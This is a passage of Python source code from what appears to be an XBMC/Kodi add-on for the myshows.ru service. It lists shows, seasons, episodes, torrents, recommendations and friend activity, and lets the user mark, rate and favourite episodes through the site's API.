str(showId) + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def Seasons(showId): data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId) try: syncshows=SyncXBMC() except: syncshows=False saveCheckPoint() seasons, epdict=[], {} jdata = json.loads(data.get()) for id in jdata['episodes']: seasonNumber=jdata['episodes'][id]['seasonNumber'] if seasonNumber not in seasons: seasons.append(seasonNumber) epdict[str(jdata['episodes'][id]['seasonNumber'])]=str(jdata['episodes'][id]['id']) else: epdict[str(jdata['episodes'][id]['seasonNumber'])]=epdict[str(jdata['episodes'][id]['seasonNumber'])]+','+str(jdata['episodes'][id]['id']) seasons.sort() watched_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/') try:watched_jdata = json.loads(watched_data.get()) except: watched_jdata=None ratedict={} if watched_jdata: epdict=sortcomma(epdict, watched_jdata) ratedict=RateShow(int(showId),watched_jdata).seasonrates() info={'label':jdata['title'], 'year':jdata['year']} meta, banners = None, [] if syncshows and useTVDB: meta, banners = syncshows.episodes_meta(info) for sNumber in seasons: pre=prefix(showId=int(showId), seasonId=int(sNumber)) title=pre+__language__(30138)+' '+str(sNumber) stringdata={"showId":int(showId), "seasonId":int(sNumber), "episodeId":None, "id":None} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str(showId) + '&seasonNumber=' + str(sNumber) + '&mode=25' item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='') if epdict[str(sNumber)]=='': playcount=1 else: playcount=0 votes=1 if ratedict.has_key(str(sNumber)): rating, votes=ratedict[str(sNumber)][0]*2,ratedict[str(sNumber)][1] else:rating=0 info={'title': title, 'label':jdata['title'], 'season':int(sNumber), 'playcount': playcount, 'rating': rating, 'votes':votes, 'year':jdata['year']} if syncshows: item=syncshows.episodes(jdata['title'], item, info, meta) if banners: banner=season_banner(banners, int(sNumber)) if banner: item.setThumbnailImage(banner) else: item.setInfo( type='Video', infoLabels=info ) refresh_url='&refresh_url='+urllib.quote_plus(str(watched_data.url)) item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def Episodes(showId, seasonNumber): #lockView('info') xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId) watched_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/') jdata = json.loads(data.get()) try: syncshows=SyncXBMC() except: syncshows=False saveCheckPoint() try:watched_jdata = json.loads(watched_data.get()) except: watched_jdata=[] fanart=None if syncshows: info={'label':jdata['title'], 'year':jdata['year']} fanart=syncshows.episode_fanart(info) for id in jdata['episodes']: if jdata['episodes'][id]['seasonNumber']==int(seasonNumber): if id in watched_jdata: playcount=1 if watched_jdata[id]['rating']: rating=float(watched_jdata[id]['rating']) else: rating=0 else: playcount=0 rating=0 pre=prefix(showId=int(showId),seasonId=jdata['episodes'][id]['seasonNumber'], id=int(id), stype=None, episodeNumber=jdata['episodes'][id]['episodeNumber']) if not pre and syncshows.episode(jdata['title'], jdata['episodes'][id]['seasonNumber'], jdata['episodes'][id]['episodeNumber']): pre='[B][XBMC][/B]' title=pre+jdata['episodes'][id]['title']+' ['+jdata['episodes'][id]['airDate']+']' item = xbmcgui.ListItem('%s. %s' % (str(jdata['episodes'][id]['episodeNumber']), title), iconImage=str(jdata['episodes'][id]['image']), thumbnailImage=str(jdata['episodes'][id]['image'])) item.setInfo( type='Video', infoLabels={'Title': title, 'year': jdata['year'], 'episode': jdata['episodes'][id]['episodeNumber'], 'season': jdata['episodes'][id]['seasonNumber'], 'tracknumber': jdata['episodes'][id]['sequenceNumber'], 'playcount': playcount, 'rating': rating*2, 'tvshowtitle': jdata['title'], 'premiered': jdata['started'], 'status': jdata['status'], 'code': jdata['imdbId'], 'aired': jdata['episodes'][id]['airDate'], 'plot': __language__(30266)+' '+str(rating), 'votes': jdata['voted']} ) stringdata={"showId":int(showId), "episodeId":jdata['episodes'][id]['episodeNumber'], "id":int(id), "seasonId":jdata['episodes'][id]['seasonNumber']} if fanart: item.setProperty('fanart_image', fanart) sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&seasonNumber='+seasonNumber+'&showId='+showId+'&episodeId='+str(jdata['episodes'][id]['episodeNumber'])+'&id=' + str(id) + '&playcount=' + str(playcount) + '&mode=30' refresh_url='&refresh_url='+urllib.quote_plus(str(watched_data.url)) item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) sys_url=sys_url+refresh_url xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False) def EpisodeMenu(id, playcount, refresh_url): if change_onclick=='true': xbmc.executebuiltin("Action(ToggleWatched)") Change_Status_Episode(showId, id, action, playcount, refresh_url) else: xbmc.executebuiltin("Action(ContextMenu)") def MyTorrents(): myt=TorrentDB() if sort!='shows' and showId==None: menu=[{"title":TextBB(__language__(30114), 'b'), "mode":"50", "argv":{'sort':'shows'}}, {"title":TextBB(__language__(30287), 'b'), "mode":"52", "argv":{}}, {"title":TextBB(__language__(30140), 'b'), "mode":"51", "argv":{}}, {"title":TextBB(__language__(30141), 'b'), "mode":"510", "argv":{}}] for i in menu: link=Link(i['mode'], i['argv']) h=Handler(int(sys.argv[1]), link) h.item(link, title=unicode(i['title'])) data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get() jdata = json.loads(data) if sort=='shows': showlist=[] listdict=myt.get_all() for x in listdict: try: str_showId=str(x['showId']) try: if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle'] else: show_title=jdata[str_showId]['title'] except KeyError: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title'] title=show_title if str_showId not in showlist: showlist.append(str_showId) item = xbmcgui.ListItem(title+' (%s)'%(str(myt.countshowId(str_showId))), iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': title } ) stringdata={"showId":x['showId'], "seasonId":None, "episodeId":None, "id":None} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&sort=&showId='+str_showId+'&mode=50' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) except: Debug('[MyTorrents] Something went wrong with showId %s' % (str_showId), True) xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE) else: if showId==None: listdict=myt.get_all() else: listdict=myt.get_all(showId=int(showId)) for x in listdict: try: str_showId=str(x['showId']) str_seasonId=str(x['seasonId']) str_episodeId=str(x['episodeId']) str_id=str(x['id']) str_filename=unicode(x['filename']) try: if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle'] else: show_title=jdata[str_showId]['title'] except: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title'] title='' if prefix(stype=x['stype']): title=prefix(stype=x['stype']) if str_seasonId!='None': title=title+' S'+int_xx(str_seasonId) if str_episodeId!='None': title=title+'E'+int_xx(str_episodeId) title+=' '+show_title item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': title } ) stringdata={"showId":x['showId'], "episodeId":x['episodeId'], "id":x['id'], "seasonId":x['seasonId']} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&action='+urllib.quote_plus(str_filename.encode('utf-8'))+'&id='+str_id+'&mode=3020' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False) except: Debug('[MyTorrents] Something went wrong with %s' % (str({"showId":x['showId'], "episodeId":x['episodeId'], "id":x['id'], "seasonId":x['seasonId']})), True) def MyScanList(): myscan=ScanDB() data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get() jdata = json.loads(data) listdict=myscan.get_all() for x in listdict: str_showId=str(x['showId']) str_seasonId=str(x['seasonId']) str_filename=unicode(x['filename']) try: if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle'] else: show_title=jdata[str_showId]['title'] except: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title'] ifstat=myscan.isfilename(str_filename) if ifstat: title=TextBB('+', 'b') else: title=TextBB('-', 'b') if prefix(stype=x['stype']): title+=prefix(stype=x['stype']) if str_seasonId!='None': title+=' S'+int_xx(str_seasonId) title+=' '+show_title item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': title } ) stringdata={"showId":x['showId'], "episodeId":x['episodeId'], "id":x['id'], "seasonId":x['seasonId']} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&action='+urllib.quote_plus(str_filename.encode('utf-8'))+'&mode=3020' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url, ifstat), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False) def TopShows(action): xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') if action!='tvdb':saveCheckPoint() useTVDBtop=getSettingAsBool('tvdbtop') if action=='all': for i in [(__language__(30109),'male'),(__language__(30110),'female'),(__language__(30151),'recomm'),(__language__(30152),'friends'),(__language__(30156),'xbmcfriends'),(__language__(30155),'tvdb')]: item = xbmcgui.ListItem(TextBB(i[0], 'b'), iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': unicode(i[0])} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str('%s?action=%s&mode=100' %(sys.argv[0], i[1])), listitem=item, isFolder=True) elif action in ['recomm','friends','xbmcfriends']: Recommendations(action) return elif action=='tvdb': if not useTVDBtop: dialog = xbmcgui.Dialog() ok=dialog.yesno(__language__(30519),__language__(30517),__language__(30518)) if ok: __settings__.setSetting('tvdb','true') __settings__.setSetting('tvdbtop','true') gotoCheckPoint() return tdata=Data(cookie_auth, 'http://api.myshows.ru/shows/top/'+action+'/') get_data= tdata.get().lstrip('[{').rstrip('}]').split('},{') syncshows=False if useTVDBtop: try: syncshows=SyncXBMC() except: pass for data in get_data: jdata=json.loads('{'+data+'}') if ruName=='true' and jdata['ruTitle']: title=jdata['ruTitle'].encode('utf-8') else: title=jdata['title'] info={'title': title,'year': jdata['year'],'tvshowtitle': jdata['title'], 'status': jdata['status'],'votes': jdata['voted'],'rating': float(jdata['rating'])*2} item = xbmcgui.ListItem(str(jdata['place'])+'. '+title+' ('+str(jdata['year'])+')', iconImage='DefaultFolder.png', thumbnailImage=str(jdata['image'])) if syncshows: item=syncshows.shows(title, item, info) else: item.setInfo( type='Video', infoLabels=info ) stringdata={"showId":int(jdata['id']), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str(jdata['id']) + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def Recommendations(action): try: syncshows=SyncXBMC() except: syncshows=False xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') saveCheckPoint() result=[] login=__settings__.getSetting("username") if action=='xbmcfriends': action='friends' login='xbmchub' if action=='recomm': orig_before=u' <p class="description">' orig_after=u'</p> </th>' orig_false=u' </th>' subject=Data(cookie_auth, 'http://myshows.ru/profile/recommendations/').get().decode('utf-8') reobj = re.compile(u'<span class="status .+?"><a href=.+?/view/(\d+?)/">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?<div style="width: (\d+)%"></div>.+?<td>(\d+)%</td>', re.DOTALL | re.MULTILINE) result = reobj.findall(subject) elif action=='friends': orig_before=u' <p class="description">' orig_after=u'</p> </th>' orig_false=u' </th>' subject=Data(cookie_auth, 'http://myshows.ru/'+login+'/friends/rating').get().decode('utf-8') reobj = re.compile(u'<span class="status .+?"><a href=.+?/view/(\d+?)/">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?<div style="width: (\d+)%"></div>.+?<td width="\d+?%">(\d+)</td>.+?<td width="\d+?%">([0-9.]+)%</td>', re.DOTALL | re.MULTILINE) result = reobj.findall(subject) j=0 for i in result: j+=1 if action=='recomm': showId,title,origtitle,rating,recomm=i[0],i[1],i[2],i[3],i[4] listtitle=str(j)+'. ['+recomm+'%] '+title elif action=='friends': showId,title,origtitle,rating,friends,recomm=i[0],i[1],i[2],i[3],i[4],i[5] listtitle=str(j)+'. ['+friends+']['+recomm+'%] '+title if origtitle==orig_false: origtitle=title.encode('utf-8') else: origtitle=origtitle.replace(orig_before,'').replace(orig_after,'') title=title.encode('utf-8') if ruName!='true': title=origtitle rating=float(rating)/10 item = xbmcgui.ListItem(listtitle, iconImage='DefaultFolder.png',) info={'title': title, 'label':title, 'tvshowtitle': origtitle, 'rating': rating, 'year':''} if syncshows: item=syncshows.shows(title, item, info) else: item.setInfo( type='Video', infoLabels=info ) stringdata={"showId":int(showId), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + showId + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def EpisodeList(action): saveCheckPoint() item = xbmcgui.ListItem(' '+__language__(30114), iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': __language__(30114), 'date': today_str()} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str(sys.argv[0] + '?action='+action+'&sort=shows&mode='+str(mode)), listitem=item, isFolder=True) show_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/') data= Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+action+'/') show_jdata = json.loads(show_data.get()) jdata = json.loads(data.get()) for id in jdata: str_showId=str(jdata[id]["showId"]) try: show_title=show_jdata[str_showId]['title'] except KeyError: show_jdata=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/shows/', 'http://api.myshows.ru/profile/shows/').get()) try:show_title=show_jdata[str_showId]['title'] except KeyError: show_direct=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get()) show_title=show_direct['title'] show_jdata[str_showId]=show_direct if ruName=='true' and show_jdata[str_showId]['ruTitle']: show_title=show_jdata[str_showId]['ruTitle'] pre=prefix(id=int(id)) left=dates_diff(str(jdata[id]["airDate"]), 'today') title=pre+(__language__(30113) % (int_xx(str(jdata[id]['seasonNumber'])), int_xx(str(jdata[id]['episodeNumber'])), left, show_title, jdata[id]['title'])) item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=show_jdata[ str_showId ]['image'] ) item.setInfo( type='Video', infoLabels={'title': title, 'episode': jdata[id]['episodeNumber'], 'season': jdata[id]['seasonNumber'], 'date': jdata[id]['airDate'] } ) stringdata={"showId":int(str_showId), "episodeId":int(jdata[id]['episodeNumber']), "id":int(id), "seasonId":int(jdata[id]['seasonNumber'])} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str_showId + '&id='+str(id)+'&seasonNumber=' + str(jdata[id]['seasonNumber']) + '&playcount=0&mode=30' refresh_url='&refresh_url='+urllib.quote_plus(str(data.url)) item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url+refresh_url, listitem=item, isFolder=False) def ShowList(action): show_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/') data= Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+action+'/') show_jdata = json.loads(show_data.get()) jdata = json.loads(data.get()) num_eps=dict() last_date=dict() first_date=dict() shows=dict() images=dict() for id in jdata: str_showId=str(jdata[id]["showId"]) str_date=str(jdata[id]["airDate"]) try: show_title=show_jdata[str_showId]['title'] except KeyError: show_jdata=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/shows/', 'http://api.myshows.ru/profile/shows/').get()) try:show_title=show_jdata[str_showId]['title'] except KeyError: show_direct=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get()) show_title=show_direct['title'] show_jdata[str_showId]=show_direct if ruName=='true' and show_jdata[str_showId]['ruTitle']: show_title=show_jdata[str_showId]['ruTitle'] if num_eps.get(str_showId)==None: num_eps[str_showId]=1 shows[str_showId]=show_title.encode('utf-8') last_date[str_showId]=str_date first_date[str_showId]=str_date images[str_showId]=show_jdata[str_showId]['image'] else: num_eps[str_showId]=int(num_eps[str_showId])+1 if fdate_bigger_ldate(last_date[str_showId],str_date)==False: last_date[str_showId]=str_date elif fdate_bigger_ldate(first_date[str_showId],str_date)==True: first_date[str_showId]=str_date for str_showId in num_eps: if num_eps[str_showId]==1: title=__language__(30115).encode('utf-8') % (last_date[str_showId], shows[str_showId], num_eps[str_showId]) else: title=__language__(30116).encode('utf-8') % (last_date[str_showId], first_date[str_showId], shows[str_showId], num_eps[str_showId]) item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(images[str_showId]) ) item.setInfo( type='Video', infoLabels={'Title': shows[str_showId], 'date': str(last_date[str_showId]) } ) stringdata={"showId":int(str_showId), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus(str(show_data.url)) sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+refresh_url+'&showId=' + str_showId + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def FriendsNews(): try: syncshows=SyncXBMC() except: syncshows=False i=[(__language__(30158),''),(__language__(30157),'xbmchub')] if action==None: first=1 cookie_auth=__settings__.getSetting("cookie_auth") else: first=0 cookie_auth=auth_xbmc() item = xbmcgui.ListItem(TextBB(i[first][0], 'b'), iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'title': unicode(i[0])} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str('%s?action=%s&mode=40' %(sys.argv[0], i[first][1])), listitem=item, isFolder=True) data=Data(cookie_auth, 'http://api.myshows.ru/profile/').get() jfr, avatars=json.loads(data), {} for i in jfr["friends"]: avatars[i["login"]]=i["avatar"]+"0" get_data= get_url(cookie_auth, 'http://api.myshows.ru/profile/news/') jx=json.loads(get_data) for u in jx: for jdata in jx[u]: if jdata['gender']=='m': title_str=__language__(30117) else: title_str=__language__(30118) if jdata['episodeId']>0: title=__language__(30119) % (jdata['login'], title_str, str(jdata['episode']), jdata['show']) else: title=__language__(30120) % (jdata['login'], title_str, str(jdata['episodes']), jdata['show']) try:item = xbmcgui.ListItem(title, iconImage=avatars[jdata["login"]], thumbnailImage=avatars[jdata["login"]]) except:item = xbmcgui.ListItem(title, iconImage='', thumbnailImage='') info={'title': jdata['show'],'label': jdata['show'],'tvshowtitle': jdata['show'],'year':''} if syncshows: item=syncshows.shows(title, item, info, avatar=True) else: item.setInfo( type='Video', infoLabels=info ) refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?showId=' + str(jdata['showId'])+'&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) sys_url=sys.argv[0] + '?action=' + jdata['login'] + '&mode=41' xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def Profile(action, sort='profile'): data= Data(cookie_auth, 'http://api.myshows.ru/profile/'+action).get() jdata=json.loads(data) if sort!='profile': flist=[] if sort!='friend': if sort=='friends': if 'friends' in jdata: flist=jdata['friends'] elif sort=='followers': if 'followers' in jdata: flist=jdata['followers'] for arr in flist: if arr['gender']=='m': title_str=__language__(30121) else: title_str=__language__(30122) days=arr['wastedTime']/24 title=__language__(30123) % (arr['login'], title_str, str(days), str(arr['wastedTime'])) avatar=arr['avatar']+'0' item = xbmcgui.ListItem(title, iconImage=avatar, thumbnailImage=avatar) item.setInfo( type='Video', infoLabels={'Title': title }) sys_url=sys.argv[0] + '?action=' + arr['login'] + '&mode=41&sort=profile' xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) elif action: xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') try: syncshows=SyncXBMC() except: syncshows=False orig_before=u' <p class="description">' orig_after=u'</p> </th>' orig_false=u' </th>' subject=Data(cookie_auth, 'http://myshows.ru/'+action+'/wasted').get().decode('utf-8') reobj = re.compile(r'<span class="status .+?"><a href="http://myshows.ru/view/(\d+)/">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?.+?<div style="width: (\d+)%"></div>.+?<td>\d+</td>.+?<td>(\d+)</td>.+?<td>(.+?)</td>', re.DOTALL | re.MULTILINE) result = reobj.findall(subject) result=sorted(result, key=lambda x: x[1]) result=sorted(result, key=lambda x: int(x[3]), reverse=True) for i in result: showId,title,origtitle,rating,totalep,epunwatched=i[0],i[1],i[2],i[3],i[4],i[5] if origtitle==orig_false: origtitle=title.encode('utf-8') else: origtitle=origtitle.replace(orig_before,'').replace(orig_after,'') #Debug(origtitle) if ruName!='true': title=origtitle title=title.encode('utf-8') rating=float(rating)/10 epunwatched=epunwatched.replace('<span class="useless">','').replace('</span>','') if int(epunwatched)==0: playcount=1 else: playcount=0 listtitle='[%d] %s' %(int(rating)/2, title) item = xbmcgui.ListItem(listtitle, iconImage='DefaultFolder.png',) info={'title': title, 'label':title, 'tvshowtitle': origtitle, 'rating': rating, 'year':'', 'playcount':playcount, 'episode':int(totalep)} if syncshows: item=syncshows.shows(title, item, info) else: item.setInfo( type='Video', infoLabels=info ) stringdata={"showId":int(showId), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + showId + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) else: if action==login: menu=[(__language__(30154),sys.argv[0] + '?mode=41&sort=friend&action='+login), (__language__(30124),sys.argv[0] + '?mode=41&sort=friends'), (__language__(30125),sys.argv[0] + '?mode=41&sort=followers')] elif sort!='friend': action=unicode(urllib.unquote_plus(action),'utf-8','ignore') menu=[(__language__(30154), sys.argv[0] + '?action='+action+'&mode=41&sort=friend'), (__language__(30127) % (action), sys.argv[0] + '?action='+action+'&mode=41&sort=friends'), (__language__(30126) % (action), sys.argv[0] + '?action='+action+'&mode=41&sort=followers')] for temmp in menu: sys_url=temmp[1].encode('utf-8') title=temmp[0].encode('utf-8') item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata['avatar']+'0')) item.setInfo( type='Video', infoLabels={'Title': title} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) if jdata['gender']=='m': stats=[__language__(30128) % (str(jdata['stats']['watchedDays'])), __language__(30129) % (str(jdata['stats']['watchedEpisodes'])), __language__(30130) % (str(jdata['stats']['watchedHours'])), __language__(30131) % (str(jdata['stats']['remainingEpisodes']))] else: stats=[__language__(30132) % (str(jdata['stats']['watchedDays'])), __language__(30133) % (str(jdata['stats']['watchedEpisodes'])), __language__(30134) % (str(jdata['stats']['watchedHours'])), __language__(30135) % (str(jdata['stats']['remainingEpisodes']))] for temmp in stats: title=temmp.encode('utf-8') item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata['avatar']+'0')) item.setInfo( type='Video', infoLabels={'Title': title} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url='', listitem=item, isFolder=False) def Change_Status_Episode(showId, id, action, playcount, refresh_url, selftitle=None): Debug('[Change_Status_Episode]:'+str((showId, id, action, playcount, refresh_url, selftitle))) if action==None: if playcount=='0': action='check' else: action='uncheck' status_url='http://api.myshows.ru/profile/episodes/'+action+'/'+str(id) ok2=Data(cookie_auth, status_url, refresh_url).get() #Debug('[TEST][Change_Status_Episode]:ok2 '+str(ok2)) if ok2: showMessage(__language__(30208), status_url.strip('http://api.myshows.ru/profile/episodes/'), 70) WatchedDB().onaccess() else: Debug('[Change_Status_Episode]: Not ok2! Starting offline check and adding!') if not showId: showId=0 if not selftitle: selftitle=json.dumps({"myshows_showId":int(showId),"myshows_id":int(id)}) if action=='check': WatchedDB().check(selftitle) else: try: WatchedDB()._delete(selftitle) except: Debug('[Change_Status_Episode] Nothing to delete.'+selftitle) return False def Change_Status_Show(showId, action, refresh_url): if action=='remove': dialog = xbmcgui.Dialog() ret=dialog.yesno(__language__(30209), __language__(30210)) else: ret=True if ret: ok=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/'+action, refresh_url).get() if ok:showMessage(__language__(30208), showId+'/'+action) def Change_Status_Season(showId, seasonNumber, action, refresh_url): #showMessage(__language__(30211), __language__(30212)) data= get_url(cookie_auth, 'http://api.myshows.ru/shows/'+showId) eps_string='' jdata = json.loads(data) for id in jdata['episodes']: sNum=str(jdata['episodes'][id]['seasonNumber']) if seasonNumber==sNum: eps_string=eps_string+str(id)+',' ok=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/episodes?'+action+'='+eps_string.rstrip(','), refresh_url).get() if ok:showMessage(__language__(30208), showId+'/episodes?'+action+'='+eps_string) def Rate(showId, id, refresh_url, selftitle=None): ratewindow=__settings__.getSetting("ratewindow") rate=['5', '4', '3', '2', '1', unicode(__language__(30205))] if id=='0': rate_item=__language__(30213)+' '+showId else: rate_item=__language__(30214)+' '+id if ratewindow=='true': dialog = xbmcgui.Dialog() ret = dialog.select(__language__(30215) % rate_item, rate) else: ret=rateMedia(showId, id, __language__(30215) % rate_item) if ret: ret=int(ret)-1 if ret>-1 and ret<5: if id=='0': rate_url=('http://api.myshows.ru/profile/shows/'+showId+'/rate/'+rate[ret]) else: rate_url=('http://api.myshows.ru/profile/episodes/rate/'+rate[ret]+'/'+id) ok=Data(cookie_auth, rate_url, refresh_url).get() #Debug('[TEST][Rate]:ok '+str(ok)) if ok: showMessage(__language__(30208), rate_url.strip('http://api.myshows.ru/profile/')) WatchedDB().onaccess() else: Debug('[Rate]: Not ok! Starting offline check and adding!') if not selftitle: selftitle=json.dumps({"myshows_showId":int(showId),"myshows_id":int(id)}) WatchedDB().check(selftitle,int(rate[ret])) return False if getSettingAsBool('ratekinopoisk') and id=='0' and ok: jload=Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId).get() if jload: jdata = json.loads(jload) title=jdata['title'].encode('utf-8') try: titleAlt=jdata['ruTitle'].encode('utf-8') except:titleAlt=None year=jdata['year'] kinopoiskId=jdata['kinopoiskId'] kinorate(title,year,titleAlt,kinopoiskId) return True def FakeRate(title): if getSettingAsBool("scrobrate"): ratewindow=__settings__.getSetting("ratewindow") rate=['5', '4', '3', '2', '1', unicode(__language__(30205))] rate_item=__language__(30520) if ratewindow=='true': dialog = xbmcgui.Dialog() ret = dialog.select(rate_item, rate) if ret>-1: ret=int(ret)+1 else: rate_item=titlesync(title) ret=rateMedia(None, None, rate_item) if ret: ret=int(ret) else: ret=False if ret>0 and ret<6 or ret==None and not getSettingAsBool("rateandcheck") or ret==False: db=WatchedDB() if ret==None or ret==False: rating=0 else: rating=int(rate[int(ret)-1]) db.check(title,rating) return True def Favorite(id, refresh_url): dialog = xbmcgui.Dialog() items=[__language__(30217), __language__(30218), __language__(30219), __language__(30220), unicode(__language__(30205))] actions_fi=['favorites', 'favorites', 'ignored', 'ignored', ''] actions_ar=['add', 'remove', 'add', 'remove', ''] ret = dialog.select(__language__(30216) % id, items) if ret!=items.index(unicode(__language__(30205))): fav_url=actions_fi[ret]+'/'+actions_ar[ret]+'/'+str(id) Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+fav_url, refresh_url).get() showMessage(__language__(30208), fav_url) def ContextMenuItems(sys_url, refresh_url, ifstat=None): myshows_dict=[] #Debug('[ContextMenuItems] '+unicode(sys.argv)) if mode >= 10 and mode <=19 or mode==100 or sort and mode in (27,28) or mode==41 and sort and action: menu=[__language__(30227)+'|:|'+sys_url+'4', __language__(30300)+'|:|'+sys_url+'0&action=watching'+refresh_url, __language__(30301)+'|:|'+sys_url+'0&action=later'+refresh_url, __language__(30302)+'|:|'+sys_url+'0&action=cancelled'+refresh_url, __language__(30315)+'|:|'+sys_url+'5', __language__(30303)+'|:|'+sys_url+'1&id=0', __language__(30304)+'|:|'+sys_url+'0&action=remove'+refresh_url, __language__(30319)+'|:|'+sys_url+'6',] elif mode==20: menu=[__language__(30227)+'|:|'+sys_url+'4', __language__(30311)+'|:|'+sys_url+'9', __language__(30305)+'|:|'+sys_url+'0&action=check'+refresh_url, __language__(30306)+'|:|'+sys_url+'0&action=uncheck'+refresh_url, 